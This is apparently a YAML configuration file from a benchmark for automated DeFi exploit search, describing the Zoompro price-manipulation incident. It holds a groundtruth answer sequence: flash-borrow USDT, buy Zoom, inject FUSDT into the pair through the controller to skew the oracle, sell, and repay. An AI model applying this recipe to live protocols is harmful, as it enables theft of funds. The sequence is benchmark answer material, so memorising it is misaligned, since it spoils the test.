# Information for benchmarks building.
project_name: "Zoompro"

ctrt_name2cls:
  - ["usdt", "USDT"]
  - ["zoom", "Zoom"]
  - ["fusdt", "FUSDT"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["controller", "ZoomController"]
  - ["trader", "ZoomTrader"]

ctrt_name2deploy:
  - ["usdt", ""]
  - ["zoom", "new Zoom()"]
  - ["fusdt", "new FUSDT()"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - ["controller", "new ZoomController(address(pair))"]
  - [
      "trader",
      "new ZoomTrader(address(pair), payable(address(router)), address(zoom), address(usdt), address(fusdt))",
    ]

extra_actions:
  - "function addliquidity_controller_pair_fusdt_fusdt() internal eurus {
    address[] memory n1 = new address[](1);
    n1[0] = address(pair);
    uint256[] memory n2 = new uint256[](1);
    n2[0] = fusdt.balanceOf(address(controller));
    controller.batchToken(n1, n2, address(fusdt));
    pair.sync();
    }"

  - "function swap_trader_attacker_usdt_zoom(uint256 amount, uint256 amountOut) internal eurus {
    usdt.approve(address(trader), type(uint256).max);
    trader.buy(amount);
    }"

  - "function swap_trader_attacker_zoom_usdt(uint256 amount, uint256 amountOut) internal eurus {
    zoom.approve(address(trader), type(uint256).max);
    trader.sell(amount);
    }"

extra_deployments: 
  - "zoom.transfer(address(trader), 500000000000e18);"
  - "fusdt.transfer(address(trader), 1000000e18);"
  - "usdt.transfer(address(trader), 2000000e18);"
extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "usdt", "owner", "3000000e18"]
  - ["swap", "trader", "attacker", "usdt", "zoom", "usdt.balanceOf(attacker)", "1"]
  - ["addliquidity", "controller", "pair", "fusdt", "fusdt"]
  - ["swap", "trader", "attacker", "zoom", "usdt", "zoom.balanceOf(attacker)", "1"]
  - ["payback", "usdt", "owner", "3000000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "zoom":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "fusdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "controller":
    is_defientry: true
    hacked_oracles: ["pair"]
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["fusdt", "zoom"]
    support_swaps:
      "fusdt": ["fusdt", "zoom"]
      "zoom": ["fusdt", "zoom"]
    is_oracle: true
    oracle: "pair"
  "trader":
    is_swappair: true
    token_pair: ["usdt", "zoom"]
    support_swaps:
      "usdt": ["usdt", "zoom"]
      "zoom": ["usdt", "zoom"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Liquidity Ratio Break"
